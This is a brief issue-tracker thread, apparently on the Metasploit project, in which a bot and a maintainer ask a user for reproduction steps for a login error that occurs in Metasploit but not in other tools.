As a friendly reminder: the best way to see this issue, or any other, fixed is to open a Pull Request.
Beep boop, this issue isn't Stale. @joswr1ght, can you still replicate this?
The steps for enabling the flags/policies to get an account to trigger this error locally where Metasploit fails and other tools succeed would definitely be appreciated 💯
I'm still thinking it's something to do with network logins versus interactive logins, but I haven't looked at this since poking at it last